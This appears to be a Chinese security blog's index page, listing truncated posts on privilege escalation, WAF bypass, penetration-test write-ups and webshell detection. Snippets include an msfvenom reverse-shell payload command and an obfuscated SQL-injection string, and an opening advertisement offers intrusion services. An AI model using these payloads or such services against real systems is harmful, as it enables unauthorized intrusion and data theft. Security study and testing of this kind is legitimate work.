-
[站外广告]业务列表介绍和一般分类
业务列表介绍和一般分类:类别:攻击入侵破解开发1:攻击业务订单:暂时取消所有此类业务订单[仅销售常规IDC流量]2:入侵业务清单:包括网站源代码,办公系统,黑色系统,教育系统等。[接受授权的业务] ...
-
LINUX SUID提权
1、简介SUID是一种特殊的文件属性,它允许用户执行的文件以该文件的拥有者的身份运行。SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限(仅对拥有执行权限的二进制程序有效)。例如,所有用户都可以执行passwd命令来修改自己的用户密码,而用户密码保存在/etc/...
-
Windows系统溢出提权
1、简介window服务器常用的是win2003win2008win2012在渗透测试中,我们获取的权限是iis_user用户组,要更高的权限就需要把当前的用户提权到系统用户或超级管理员用户组。更高的权限方便我们在后续的渗透中,扩大范围测试。2、程序权限的对比在iis里面权限依次的...
-
mysql udf 提权
1、简介在mysql可以使用自定义函数进行提权,udf=userdefinedfunction用户自定义函数对于自定义的函数在mysql5.1版本以后就需要放在插件插件目录/lib/plugin,文件后缀微dll,c语言编写2、插件目录可以使用语句查询plugin插件目录sho...
-
Sqlserver提权
1、简介如果网站里面使用的数据库是sqlserver那么如果找到sa的密码,利用提权脚本,执行命令,但是不一定的系统权限,还要看管理员开始安装sqlserver的权限设置。2、查找帐号和密码web.configconfig.aspconn.aspxdatabase.aspx3、开启xp_cmd...
-
zend nc 提权
1、简介在php里面有一个扩展是zend这个是用解析phpzend脚本加密文件。如果服务器安装了zend如果ZendExtensionManager.dll权限可以修改,那就可以用其他dl替换这dll文件。查找ZendExtensionManager.dllC:\ZkeysSoft\Zen...
-
zend反弹shell提权
这篇是接着上篇内容所说。Zend_DLL_Hijacking.exe执行远控msfconsole生成反弹shell生成攻击载荷msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.0.106lport=12345-fexe&...
-
FileZilla 提权
1、简介FileZilla是一个ftp服务器,假如配置不严的,读取xml密码可以执行一些简答的命令默认安装目录C:\ProgramFiles\FileZillaServer\2、提权FileZillaServerInterface.xml<FileZ...
-
msf结合漏洞审计工具进行提权
1、windows补丁审计工具使用在终端下可以使用命令systeminfo来查看系统的一些补丁信息http://www.demo1.com/asp.aspx补丁检测Windows-Exploit-Suggesterhttps://github.com/GDSSecurity/Windows...
-
渗透测试工具实战技巧合集
最好的NMAP扫描策略#适用所有大小网络最好的nmap扫描策略#主机发现,生成存活主机列表$nmap-sn-T4-oGDiscovery.gnmap192.168.56.0/24$grep"Status:Up"Discovery.gnmap|cut-f2-...
-
最新过安全狗注入语句
union%23muxue%0Aselect%23mux%0A1,2,group_concat(table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18frominformation_schema.tableswheretable_schema='j...
-
记一次阿里云主机泄露Access Key到Getshell
0x01前言此次渗透为一次授权渗透测试,门户网站找出了一堆不痛不痒的小漏洞,由于门户网站敏感特征太多而且也没什么特殊性就没有截图了,后台则是根据经验找出并非爆破目录,涉及太多敏感信息也省略了,我们就从后台开始。PS:本文仅用于技术讨论,严禁用于任何非法用途,违者后果自负。0x02正文拿到网站...
-
记一次不出网的渗透测试
前言周末时间中午吃饱喝足后,闲着无聊上线玩了几把游戏,听着音乐,本想周末就这样悠闲的过的,怎么老输,开始键盘侠上线,没办法,人菜又瘾大。PS:本文仅用于技术讨论,严禁用于非法用途,违者后果自负,与本站及作者无关。S2-046打点突然手机微信响了下,说有个测试,要开始干活。给一了个IP地址,先是进行...
-
细说渗透江湖之披荆斩棘
前言说来话长,在一个月黑风高的晚上,突然接到一个渗透任务,貌似还挺急,在客户充分授权的情况下,便连夜进行测试。由于本次渗透时间紧任务重,以拿权限为主,信息收集时需要格外仔细,端口、C段、指纹、路径、fofa、目录、github、网盘等等,有关信息进行收集,当然了403,404,nginx等页面也是...
-
前端JavaScript渗透测试步步为营
细心到极致方可不错失漏洞。事情起因在某次难度较高的众测项目中,笔者遇到了一个看起来”绝对安全的系统“,项目上线几天后此系统仍然没有被测试出漏洞,在没有系统功能、各种访问404的、没有测试账户的情况下,仍然揪出了隐藏在角落的漏洞,获得了高额赏金,算是在挖洞的道路上越走越远了,哈哈~本文分享在此漏洞挖掘...
-
包含文件结合phpinfo反弹交互shell
1.简介在PHP文件包含漏洞中,当我们找不到用于触发RCE的有效文件时,如果存在PHPINFO(它可以告诉我们临时文件的随机生成的文件名及其位置),我们可能可以包含一个临时文件来利用它。当向PHP发送POST请求并且请求包含一个文件块时,PHP会将所发送的文件保存到一个临时文件中(通常是/tmp/P...
-
漏洞及渗透练习平台 【大全】
WebGoat漏洞练习环境https://github.com/WebGoat/WebGoathttps://github.com/WebGoat/WebGoat-LegacyDamnVulnerableWebApplication(漏洞练习平台)https://github.com/Rando...
-
burpsuite 抓取 https ssl 数据包
burpsuite抓取httpsssl数据包火狐浏览器设置代理把ssl也勾上不然设置成功也抓不到包。打开burpsuite之后访问http:locahost:8080下载证书查看证书->导入证书记得把这个选项也要勾上这样就设置成功成功抓取https://a...
-
应急响应之如何发现隐藏的Webshell后门
如何在百万行代码里发现隐藏的后门试想一下,如果你的网站被入侵,攻击者留下隐藏的后门,你真的都可以找出来嘛?面对一个大中型的应用系统,数以百万级的代码行,是不可能做到每个文件每段代码进行手工检查的。即使是一款拥有99.9%的Webshell检出率的检测引擎,依然可能存在Webshell绕过的情况。另外...